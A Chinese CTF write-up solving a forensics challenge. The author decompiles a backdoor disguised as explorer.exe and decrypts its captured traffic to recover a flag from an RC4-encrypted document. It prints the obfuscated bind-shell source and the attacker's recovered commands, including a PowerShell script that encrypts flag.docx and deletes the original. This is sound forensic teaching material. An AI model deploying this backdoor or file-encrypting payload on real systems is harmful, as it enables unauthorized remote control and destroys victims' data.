分享一道好的misc题


拯救客服小祥

首先下载附件得到一个exe文件、密文以及流量包

exe运行没显示,查看exe是什么编译的

得知是python文件,使用pyinstxtractor解包

pyc反编译为py文件

完整代码

# Source Generated with Decompyle++
# File: explorer.pyc (Python 3.10)

import socket
import os
import subprocess

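def IIol0OlIll(o00oo1l0O1 = None, OIOlIO1Iol = None):
    """RC4 the data *o00oo1l0O1* (bytes) under the key *OIOlIO1Iol*.

    RC4 is symmetric, so one function both encrypts and decrypts. The backdoor
    calls it with the key 'mambaout' for inbound commands and 'mikumiku' for
    the command output it returns.

    Fix over the decompiled listing: Decompyle++ rendered each tuple swap as
    two sequential assignments (``S[i] = S[j]; S[j] = S[i]``), which leaves
    both slots equal to ``S[j]`` and never permutes the S-box. The swaps are
    restored, which is what the binary does (the capture decrypts under a
    standard ARC4 with these keys).

    Args:
        o00oo1l0O1: iterable of byte values (``bytes``/``bytearray``).
        OIOlIO1Iol: key as ``str`` (characters are taken with ``ord``, as the
            original did) or as ``bytes``.

    Returns:
        The keystream-XORed data as ``bytes``.

    Raises:
        ValueError: if the key is empty or ``None``.
        TypeError: if *o00oo1l0O1* is ``None`` or yields non-integers.
    """
    if not OIOlIO1Iol:
        raise ValueError("RC4 key must be non-empty")
    if isinstance(OIOlIO1Iol, str):
        # ord() rather than .encode() keeps the original's handling of
        # non-ASCII key characters (the sum is reduced mod 256 below anyway).
        key = [ord(ch) for ch in OIOlIO1Iol]
    else:
        key = list(OIOlIO1Iol)
    key_len = len(key)

    # Key-scheduling algorithm: permute the identity S-box with the key.
    sbox = list(range(256))
    j = 0
    for i in range(256):
        j = (j + sbox[i] + key[i % key_len]) % 256
        sbox[i], sbox[j] = sbox[j], sbox[i]

    # Pseudo-random generation: one keystream byte per input byte, XORed in.
    i = j = 0
    out = bytearray()
    for value in o00oo1l0O1:
        i = (i + 1) % 256
        j = (j + sbox[i]) % 256
        sbox[i], sbox[j] = sbox[j], sbox[i]
        out.append(value ^ sbox[(sbox[i] + sbox[j]) % 256])
    return bytes(out)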

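# Custom base64 alphabet recovered from the binary. Compared with the standard
# table it has the lower-case and upper-case halves swapped and the characters
# '0' and 'O' exchanged; index 64 is the '=' padding character.
O1Il1I01oI = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMN0PQRSTUVWXYZO123456789+/='


def OlolI1lI1l(o00oo1l0O1 = None):
    """Decode *o00oo1l0O1* (ASCII bytes in the custom alphabet) to raw bytes.

    Fix over the decompiled listing: the statement that turned each
    four-character group into alphabet indices was lost (it surfaces as
    ``lolOoIOlIo = None`` / ``None.append``), so it is restored here. As in
    the original, decoding stops at the first '=' pad (index 64).

    Args:
        o00oo1l0O1: encoded text as ``bytes``; its length must be a multiple
            of four.

    Returns:
        The decoded payload as ``bytes``.

    Raises:
        ValueError: for a length that is not a multiple of four, a character
            outside the alphabet, or a pad in the first two positions.
    """
    text = o00oo1l0O1.decode()
    if len(text) % 4:
        raise ValueError("encoded length must be a multiple of 4")
    out = bytearray()
    for start in range(0, len(text), 4):
        # str.index raises ValueError for a character outside the alphabet.
        a, b, c, d = (O1Il1I01oI.index(ch) for ch in text[start:start + 4])
        if a == 64 or b == 64:
            raise ValueError("padding character in an invalid position")
        out.append((a << 2) + (b >> 4))
        if c == 64:
            break
        out.append(((b & 15) << 4) + (c >> 2))
        if d == 64:
            break
        out.append(((c & 3) << 6) + d)
    return bytes(out)


def OlOI01O0Oo(o00oo1l0O1 = None):
    """Encode raw bytes *o00oo1l0O1* with the custom alphabet.

    Fix over the decompiled listing: the three-byte slice taken per loop
    iteration was lost (``lolOoIOlIo = None``), leaving the loop index being
    subscripted; the slice is restored here.

    Args:
        o00oo1l0O1: payload as ``bytes``/``bytearray``.

    Returns:
        The encoded text as ASCII ``bytes``, padded with '=' like base64.
    """
    out = []
    for start in range(0, len(o00oo1l0O1), 3):
        chunk = o00oo1l0O1[start:start + 3]
        out.append(O1Il1I01oI[chunk[0] >> 2])
        if len(chunk) == 1:
            out.append(O1Il1I01oI[(chunk[0] & 3) << 4])
            out.append('==')
            continue
        out.append(O1Il1I01oI[((chunk[0] & 3) << 4) + (chunk[1] >> 4)])
        if len(chunk) == 2:
            out.append(O1Il1I01oI[(chunk[1] & 15) << 2])
            out.append('=')
            continue
        out.append(O1Il1I01oI[((chunk[1] & 15) << 2) + (chunk[2] >> 6)])
        out.append(O1Il1I01oI[chunk[2] & 63])
    return ''.join(out).encode()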

# --- Bind-shell main loop, as decompiled. Not valid Python in this form:
# the two `continue` statements have no enclosing loop, so the decompiler
# most likely dropped a `while True:` around the accept()/recv() sequence
# (the capture shows many command/response pairs on one session) — confirm
# against the bytecode.
I0lo1olIll = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Listens on every interface, TCP port 11451. Together with the process name
# (the capture's dir listing shows the sample as explorer.exe on the Desktop,
# not in the system directory) this is the obvious host-side detection point.
I0lo1olIll.bind(('0.0.0.0', 11451))
I0lo1olIll.listen(1)
(I1l01110Il, _) = I0lo1olIll.accept()
# Cleartext handshake: the first message must be b'mambaout', answered with
# b'welcome'. Both appear unencoded as the first two lines of the capture, so
# they make a usable network signature for this sample.
if I1l01110Il.recv(1024) != b'mambaout':
I1l01110Il.close()
continue
I1l01110Il.send(b'welcome')
# Decompiler artifact: `if x = recv(...) != b''` is an assignment rendered
# without walrus syntax; read it as "while a non-empty message arrives".
if o00oo1l0O1 = I1l01110Il.recv(1024) != b'':
# Inbound traffic: custom-alphabet base64, then RC4 under the key 'mambaout'.
o00oo1l0O1 = OlolI1lI1l(o00oo1l0O1)
o00oo1l0O1 = IIol0OlIll(o00oo1l0O1, 'mambaout')
# 'cd ' changes the working directory of the implant itself; 'exit' drops
# the connection. Everything else is handed to the system shell.
if o00oo1l0O1.startswith(b'cd '):
os.chdir(o00oo1l0O1[3:].decode())
I1l01110Il.send(b'')
elif o00oo1l0O1.startswith(b'exit'):
I1l01110Il.close()
else:
# `True, True, **('shell', 'capture_output')` is how Decompyle++ shows the
# keyword arguments shell=True, capture_output=True. stdout is RC4-encrypted
# with 'mikumiku' and re-encoded with the custom alphabet. The send() of
# `data`, and the 'Command executed successfully' reply seen in the capture
# for commands with no output, are not visible here — presumably lost in
# decompilation.
data = OlOI01O0Oo(IIol0OlIll(subprocess.run(o00oo1l0O1.decode(), True, True, **('shell', 'capture_output')).stdout, 'mikumiku'))
if not o00oo1l0O1 = I1l01110Il.recv(1024) != b'':
continue

看得出来代码做了混淆,又有base换表又有RC4加密

再看流量包文件

将此内容保存为1.txt

mambaout
welcome
/91GoZwO
VqIzSlBK+tRsG0RKMO+Y4Dd6nO/q3Qe=
7nX9
/70DB2flyeBWXJfDqoj/EgHCy3pB0n/rDXmo1FwwUsSbnIbYtPgVokthWpi43wPcDYD7zz7s1Qm6ByTCS2SC9fsHQRJuEVd9kzHzdLBtEN6WWBT35+NQa+xdZYfH8WGCDRQAo8qpxlIrWWF/VAgG07gS6AVSnrfFGvJAG2POK7eZexVbsNrh9geFz+uOUeRUcm46YhnSVQ1psreXA7qMULrpzahoPqURPSm9uUyMUJq+64YP7iZj+7/J4860rdk7v56zf/00SbWvM85NvpDmbngGkUINvABMbw1Nz+ftWaOCsenSrC0xlt1oKPV2WzgCKO/nWrodDAmjF6lpqnYa7+INcquC4cONZ65h+2Jz6yS8oYh59nS6yOclpa5RiHMqMYBKcTlq5N4IDpBywJEND+ZtYbdLVkQzSzRwOYbBaGLmfAy43rrxUwI0RYNbBHzIYpRrjv57CtvKd2pYmWkiPSpWK2kxH94cqJwWBTkE
7DzNnxI79cMT70hUCqalxfNqMuMS4d/UO9C92vgXhZHaGNu=
NbknTk/J8OBwN0lUGfkK8yl0nKpbTTJhFgT0Mti=
7DzNnxI34dg870l9Ca4ehqAsKe62RsJRHW==
NbknTk/J8OBwN0lUGfkK8yl0nKpbTTJhFgT0Mti=
/mX/p3I28dVM/jx7
TqItRAJI5qdgImEa/W==
7nX9
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
7DzNnxI74cYR/itGEfSfdvF7LgkG72Z8O5i9GqpWchDnLM5DCgm+3om=
NbknTk/J8OBwN0lUGfkK8yl0nKpbTTJhFgT0Mti=
7DzNnxIT9dcP5C2NnKvuhuJtGKEG4JI9G50S
NbknTk/J8OBwN0lUGfkK8yl0nKpbTTJhFgT0Mti=
7DzNnxIg9ZU87BBss18JuNgcTbR/YHpC38KJGr2Ggw9yLwbyoJO9NG==
NbknTk/J8OBwN0lUGfkK8yl0nKpbTTJhFgT0Mti=
7DzNnxIg9ZU87BBss18LCNh9L2l+722JO9CJNO2XaxPBM2uszd5/
NbknTk/J8OBwN0lUGfkK8yl0nKpbTTJhFgT0Mti=
7DzNnxJOTxZ2Qj3UBXCfxfYCI1J+
NbknTk/J8OBwN0lUGfkK8yl0nKpbTTJhFgT0Mti=
7DzNnxJ53hkNX4lgxXqLurIp2XVHRw6MXSKJGr2Ggw9yLwbyoJO9NG==
NbknTk/J8OBwN0lUGfkK8yl0nKpbTTJhFgT0Mti=
7DzNnxJ5+I2NUn3JjK0fDbIp2XVVVwkZG4HKO1kXhdHeIta=
NbknTk/J8OBwN0lUGfkK8yl0nKpbTTJhFgT0Mti=
7DzNnxJ53c3559Y/EJqgDbIp2W+g7bwJVnGT9NkFvLPrLgziFg1WKFlYkJPqF5Y5UzqREG==
NbknTk/J8OBwN0lUGfkK8yl0nKpbTTJhFgT0Mti=
7DzNnxI7+Jd00mNJEtrACNEcYKsG02gZW9i9M1g/nYz7TtenEYjUGR72A3ejjSB9S4G3blWAAuLaQypBvhH5nQA321KXVSf6QUubRup4da==
NbknTk/J8OBwN0lUGfkK8yl0nKpbTTJhFgT0Mti=
7DzNnxJ5+I2NUn3JjK0fDbIp2WpR7dp8W9LXJWY/mtyF2Iv1jcibWjVljaXqs9MX+kT0bmnLfXyEM8ZBx3uqiS+5QKHXLVDzNQaj7hY7CVx+Y/E8ASNoR5xojrk+evBOTnS+sbvDGKWbvu5wYHZAb0ZwVCnaCHP5ia==
NbknTk/J8OBwN0lUGfkK8yl0nKpbTTJhFgT0Mti=
7DzNnxJ53hkNX4lgxXqLuwowLOsaSXpCW9HYOgd8wdj9YM5ZEWqhWj3UegDtF5lTP4H0EUmCE1Lm5SI5tZ4wiS/aIJyTHjX5QUTvS1+7dnwhP7tZBQxE5jpoxttGBLBG/p4mlGu37u4fdae11akur4xBQ85lpq4KyDj6
NbknTk/J8OBwN0lUGfkK8yl0nKpbTTJhFgT0Mti=
7DzNnxIGTxZ2Qj3UBXCfxfYCI1J+
NbknTk/J8OBwN0lUGfkK8yl0nKpbTTJhFgT0Mti=
7DzNnxJ5+s2hUklajK0fuHIp2XVVVwkZG4HKO1kXhdHeIta=
NbknTk/J8OBwN0lUGfkK8yl0nKpbTTJhFgT0Mti=
7DzNnxJ5+I2NUn3JjK0fDbIp2XVVVwkZG4HKO1kXhdHeIta=
NbknTk/J8OBwN0lUGfkK8yl0nKpbTTJhFgT0Mti=
7DzNnxJ5+s6hWD3awtqguHIp22VNQNYTZCLT3Ks8f3Dq1hfpjq==
NbknTk/J8OBwN0lUGfkK8yl0nKpbTTJhFgT0Mti=
7DzNnxI7+Jd00mNawtqguvFDLaVY02Y0O81s8hk8fhLBLserEdLUI53naGXqwCYXPTr2b+K7qqOz/CZumb4wiERMIHzQ9je2VQrBVrp7xmoILFM3zjYDUG==
NbknTk/J8OBwN0lUGfkK8yl0nKpbTTJhFgT0Mti=
7DzNnxJ5+s2hUklajK0fuHIp2WpR7ZpCW6zsJWY/fZyF2JavngHUNEEOA3Ocmi2870G3kUH7vGPa
NbknTk/J8OBwN0lUGfkK8yl0nKpbTTJhFgT0Mti=
7DzNnxJ5+I2NUn3JjK0fDbIp2WpR7dp8W9LXJWY/mtyF2Iv1jcibWjVljaXqs9MX+kT0bmnLfXyEM8xqwNfRElcP2ODHR9LVQESe5X37t0S=
NbknTk/J8OBwN0lUGfkK8yl0nKpbTTJhFgT0Mti=
7DzNnxJ53hkNX4lgxXqLuwowLOsaSXpCW9HYOgd8wdj9YM5ZEWqhWj3UegDtF5lTP4H0EUmCE1Lm5SI5tZ4wiS/aIJyTHjX5QUTvS1+7dnwhP7tZBQxE5jpoxttGBLBG/p4mlGu37u4fdae11akur4xBQ85lpq4KyDj6
NbknTk/J8OBwN0lUGfkK8yl0nKpbTTJhFgT0Mti=
7DzNnxJ5+s6hWD3awtqguHIzXGVRZbpAVivuJLhHseOqTu5ZEceHWl3FA25EAjkVT8arE+mAsta4QAoCjhL9blBMQHyiLTDzQD9b71ZedFwbYQM8jBho0pYfxu3GBLxYKFOSdw5CZrfBu14eXa3flQIt80CeBL88tif1dRNvi8nyaka2vQkata==
NbknTk/J8OBwN0lUGfkK8yl0nKpbTTJhFgT0Mti=
7DzNnxIGTxZ2Qj3UBXCfxfYCI1J+
NbknTk/J8OBwN0lUGfkK8yl0nKpbTTJhFgT0Mti=
7DzNnxIV8dA9+0oVtrKtsv3PPNBR7ZdCUTLs8hk8fZykXcfmDtqIWlpMztnpiq==
NbknTk/J8OBwN0lUGfkK8yl0nKpbTTJhFgT0Mti=
7DzNnxIGTxZ2Qj3UBXCfxfYCI1J+
NbknTk/J8OBwN0lUGfkK8yl0nKpbTTJhFgT0Mti=
7DzNnxJ5+I2hWyg+EHqJDbIp2WYP7Z3O3y1Y3ex3wcGk2NfDBseHZRASoZan
NbknTk/J8OBwN0lUGfkK8yl0nKpbTTJhFgT0Mti=
7DzNnxJ5+NoKWyhajOPBdrIp23cC+I/NL0qZ9Nl+pN9yN1WglH8RZRBdjY9+AyM45mX8jomABXvaQ0o5nNH5C7IPLrG4S9D30A0v8ai=
NbknTk/J8OBwN0lUGfkK8yl0nKpbTTJhFgT0Mti=
7DzNnxJ5+q2b54hGxOSfCHIp23cC+I/NL0qZ9Nl+pN9yN1WglH8RZRBdjY9+AyM45mX/ioKScaOjSSVzx29NBFB0NbuUVTW4TFDu
NbknTk/J8OBwN0lUGfkK8yl0nKpbTTJhFgT0Mti=
7DzNnxIgXJU7/iJIodiLe37BLO6sUwBeGybP2NY8ffrnJMrppg00W7pLzsDtC4xZ8007Bkb1dHzbQAwFnJ41FEMPWruoLTD6QS1v7hYRgDx/LTg/bD3FUUYipv2XhXRlUESpdLqCJa5huG==
NbknTk/J8OBwN0lUGfkK8yl0nKpbTTJhFgT0Mti=
7DzNnxIp8c+N/0IIxW8pubIwLesaYJcIN4zu9H3UrJzeM3HqEYWQGAlXEG==
NbknTk/J8OBwN0lUGfkK8yl0nKpbTTJhFgT0Mti=
7DzNnxIp8c+N/0IIxW8pubIvKe62RsJRH849GqpWchDnLM5DCgm+3om=
NbknTk/J8OBwN0lUGfkK8yl0nKpbTTJhFgT0Mti=
7nX9
/70DB2flyeBWXJfDqoj/EgHCy3pB0n/rDXmo1FwwUsSbnIbYtPgVokthWpi43wPcDYD7zz7s1Qm6ByTCS2SC9fsHQRJuEVd9kzHzdLBtEN6WWBT35+NQa+xdZYfH8WGCDRQAo8qpxlIrWWF/VAgG07gS6AVSnrfFGvJAG2POK7eZexVbsNrh9geFz+uOUeRUcm46YhnSVQ1psreXA7qMULrpzahoPqURPSm9uUyMUJq+64YP7iZj+7/J4860rdk7v56zf/00SbWvM85NvpDmbngGkUINvABMbw1Nz+ftWaOCsenSrC0xlt1oKPV2WzgCKO/nWrodDAmjF6lpqnYa7+INcquC4cONZ65h+2Jz6ySUkZpT+800BfgBpa55mqotGR4Y5dzmoh4IDpBywIkRyFRr1GE15oSPsvnOQIDXebLEaAKPZXTgQwI0VtRjF5EOlguZUv5VydLOgNl+jroDU8lJYIDryhM54E4hHU+Mhv5nnJJYxBqVxwxtybpOaUjocDgz3NMo0Lbb8KjV4WrItgE9ltDXOg5APK2scizZLUVunzpQErjBFNdJq5Mr9QKRgbjsKDkEGfWRl9rtystHqsYniheAI7AeSg9BDTQwnPPdsU4Ms/jXWM2LrB2+gb17qpCw2pLXW8DHsHFYoWCsDAigw7BaiwJjs08=
+nP4pYQU/sEK5m2IuWmpxK3gKKsHOZp/M0PKN3+PchDhIseruIqIYVkSfZnDAzgY90b2o/9K
NbknTk/J8OBwN0lUGfkK8yl0nKpbTTJhFgT0Mti=
7nX9
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
7C1MlG==

写一个脚本解密1.txt

exp:

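from Crypto.Cipher import ARC4
import base64
import sys

# Decrypt the saved capture (1.txt) of the explorer.exe bind shell.
#
# Line layout of the capture: lines 0 and 1 are the cleartext handshake
# ('mambaout' / 'welcome'); from line 2 on, even indices are commands and odd
# indices are the corresponding outputs. Every line is custom-alphabet base64
# over RC4, keyed 'mambaout' for commands and 'mikumiku' for outputs.

# Capture path: first command-line argument, else the author's original location.
CAPTURE_PATH = sys.argv[1] if len(sys.argv) > 1 else 'D:\\tmp\\拯救客服小祥附件\\1.txt'

# string1 is the alphabet recovered from explorer.pyc, string2 the standard
# one; translating custom -> standard lets base64.b64decode do the decoding.
string1 = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMN0PQRSTUVWXYZO123456789+/='
string2 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="
TO_STANDARD = str.maketrans(string1, string2)

KEY_COMMAND = b'mambaout'
KEY_OUTPUT = b'mikumiku'

# The capture is pure ASCII, so the encoding only needs to be explicit, not
# locale-dependent; the file is closed as soon as the lines are read.
with open(CAPTURE_PATH, encoding='utf-8') as capture:
    lns = capture.readlines()

for i in range(2, len(lns)):
    x = lns[i].strip()
    y = base64.b64decode(x.translate(TO_STANDARD))
    # A fresh cipher per line: the implant keys RC4 anew for every message,
    # so the keystream must not carry over between lines.
    if i % 2 == 0:
        print('-' * 60)
        z = ARC4.new(KEY_COMMAND).decrypt(y)
    else:
        z = ARC4.new(KEY_OUTPUT).decrypt(y)
    # Output comes from a Chinese-locale Windows shell, hence GBK. Replacing
    # undecodable bytes keeps one bad line from aborting the whole dump.
    print(z.decode('gbk', errors='replace'))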

运行得到

将完整内容保存到2.txt

------------------------------------------------------------
whoami
buyixin\administrator


------------------------------------------------------------
dir
驱动器 C 中的卷是 System

卷的序列号是 9219-C9C1



C:\Users\Administrator\Desktop 的目录



2024/12/10 23:19 <DIR> .

2024/07/22 09:22 <DIR> ..

2024/12/10 22:05 5,648,364 explorer.exe

2024/12/10 23:18 12,400 flag.docx

2 个文件 5,660,764 字节

2 个目录 41,051,615,232 可用字节


------------------------------------------------------------
echo fakeflag{aaabbbccc} > flag.txt
Command executed successfully
------------------------------------------------------------
echo justforfun > key.txt
Command executed successfully
------------------------------------------------------------
type key.txt
justforfun


------------------------------------------------------------
dir
驱动器 C 中的卷是 System

卷的序列号是 9219-C9C1



C:\Users\Administrator\Desktop 的目录



2024/12/10 23:19 <DIR> .

2024/07/22 09:22 <DIR> ..

2024/12/10 22:05 5,648,364 explorer.exe

2024/12/10 23:18 12,400 flag.docx

2024/12/10 23:19 22 flag.txt

2024/12/10 23:19 13 key.txt

4 个文件 5,660,799 字节

2 个目录 41,056,251,904 可用字节


------------------------------------------------------------
echo function o0oIoIol0o { >> payload.ps1
Command executed successfully
------------------------------------------------------------
echo param ( >> payload.ps1
Command executed successfully
------------------------------------------------------------
echo [byte[]]$IoI0O10IOO, >> payload.ps1
Command executed successfully
------------------------------------------------------------
echo [byte[]]$OOIOlI1l10 >> payload.ps1
Command executed successfully
------------------------------------------------------------
echo ) >> payload.ps1
Command executed successfully
------------------------------------------------------------
echo $I0oOoIIoOl = 0..255 >> payload.ps1
Command executed successfully
------------------------------------------------------------
echo $ooo00l01oI = 0 >> payload.ps1
Command executed successfully
------------------------------------------------------------
echo $Io1o10lOlI = $IoI0O10IOO.Length >> payload.ps1
Command executed successfully
------------------------------------------------------------
echo for ($loO0OO01oo = 0; $loO0OO01oo -lt 256; $loO0OO01oo++) { >> payload.ps1
Command executed successfully
------------------------------------------------------------
echo $ooo00l01oI = ($ooo00l01oI + $I0oOoIIoOl[$loO0OO01oo] + $IoI0O10IOO[$loO0OO01oo % $Io1o10lOlI]) % 256 >> payload.ps1
Command executed successfully
------------------------------------------------------------
echo $I0oOoIIoOl[$loO0OO01oo], $I0oOoIIoOl[$ooo00l01oI] = $I0oOoIIoOl[$ooo00l01oI], $I0oOoIIoOl[$loO0OO01oo] >> payload.ps1
Command executed successfully
------------------------------------------------------------
echo } >> payload.ps1
Command executed successfully
------------------------------------------------------------
echo $loO0OO01oo = 0 >> payload.ps1
Command executed successfully
------------------------------------------------------------
echo $ooo00l01oI = 0 >> payload.ps1
Command executed successfully
------------------------------------------------------------
echo $llOI0OOOlo = @() >> payload.ps1
Command executed successfully
------------------------------------------------------------
echo for ($OOOllooo = 0; $OOOllooo -lt $OOIOlI1l10.Length; $OOOllooo++) { >> payload.ps1
Command executed successfully
------------------------------------------------------------
echo $loO0OO01oo = ($loO0OO01oo + 1) % 256 >> payload.ps1
Command executed successfully
------------------------------------------------------------
echo $ooo00l01oI = ($ooo00l01oI + $I0oOoIIoOl[$loO0OO01oo]) % 256 >> payload.ps1
Command executed successfully
------------------------------------------------------------
echo $I0oOoIIoOl[$loO0OO01oo], $I0oOoIIoOl[$ooo00l01oI] = $I0oOoIIoOl[$ooo00l01oI], $I0oOoIIoOl[$loO0OO01oo] >> payload.ps1
Command executed successfully
------------------------------------------------------------
echo $llOI0OOOlo += $OOIOlI1l10[$OOOllooo] -bxor $I0oOoIIoOl[($I0oOoIIoOl[$loO0OO01oo] + $I0oOoIIoOl[$ooo00l01oI]) % 256] >> payload.ps1
Command executed successfully
------------------------------------------------------------
echo } >> payload.ps1
Command executed successfully
------------------------------------------------------------
echo return [byte[]]$llOI0OOOlo >> payload.ps1
Command executed successfully
------------------------------------------------------------
echo } >> payload.ps1
Command executed successfully
------------------------------------------------------------
echo $ooOIl1loII = 'flag.docx' >> payload.ps1
Command executed successfully
------------------------------------------------------------
echo $o1lIlO1110 = [System.IO.File]::ReadAllBytes($ooOIl1loII) >> payload.ps1
Command executed successfully
------------------------------------------------------------
echo $lOIoloI0oO = [System.IO.File]::ReadAllBytes('key.txt') >> payload.ps1
Command executed successfully
------------------------------------------------------------
echo [System.IO.File]::WriteAllBytes('flag.docx.enc', (o0oIoIol0o $lOIoloI0oO $o1lIlO1110)) >> payload.ps1
Command executed successfully
------------------------------------------------------------
echo Remove-Item $ooOIl1loII >> payload.ps1
Command executed successfully
------------------------------------------------------------
echo Remove-Item 'key.txt' >> payload.ps1
Command executed successfully
------------------------------------------------------------
dir
驱动器 C 中的卷是 System

卷的序列号是 9219-C9C1



C:\Users\Administrator\Desktop 的目录



2024/12/10 23:19 <DIR> .

2024/07/22 09:22 <DIR> ..

2024/12/10 22:05 5,648,364 explorer.exe

2024/12/10 23:18 12,400 flag.docx

2024/12/10 23:19 22 flag.txt

2024/12/10 23:19 13 key.txt

2024/12/10 23:19 1,212 payload.ps1

5 个文件 5,662,011 字节

2 个目录 41,055,326,208 可用字节


------------------------------------------------------------
powershell -ExecutionPolicy Bypass -File .\payload.ps1
Command executed successfully
------------------------------------------------------------
dir
驱动器 C 中的卷是 System

卷的序列号是 9219-C9C1



C:\Users\Administrator\Desktop 的目录



2024/12/10 23:19 <DIR> .

2024/07/22 09:22 <DIR> ..

2024/12/10 22:05 5,648,364 explorer.exe

2024/12/10 23:19 12,400 flag.docx.enc

2024/12/10 23:19 22 flag.txt

2024/12/10 23:19 1,212 payload.ps1

4 个文件 5,661,998 字节

2 个目录 41,055,301,632 可用字节


------------------------------------------------------------
exit

看得出来是powershell里有RC4,密钥也有

echo fakeflag{aaabbbccc} > flag.txt
Command executed successfully
------------------------------------------------------------
echo justforfun > key.txt
Command executed successfully


echo $ooo00l01oI = ($ooo00l01oI + $I0oOoIIoOl[$loO0OO01oo] + $IoI0O10IOO[$loO0OO01oo % $Io1o10lOlI]) % 256 >> payload.ps1

还剩下一个密文附件,对其进行RC4解密

密钥是

6A 75 73 74 66 6F 72 66 75 6E 20 0D 0A

注意

0D 0A就是\r\n,windows系统的换行;前面的20是echo命令里">"前面的那个空格,也被一并写进了key.txt,所以密钥要连空格和换行一起算

赛博厨子进行解密

保存到本地文件

一看就是docx文件,修改后缀.docx打开

最后flag为

flag{4b0917f6-5878-4514-99c2-33683f514ca8}

文章作者: yiqing
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 yiqing !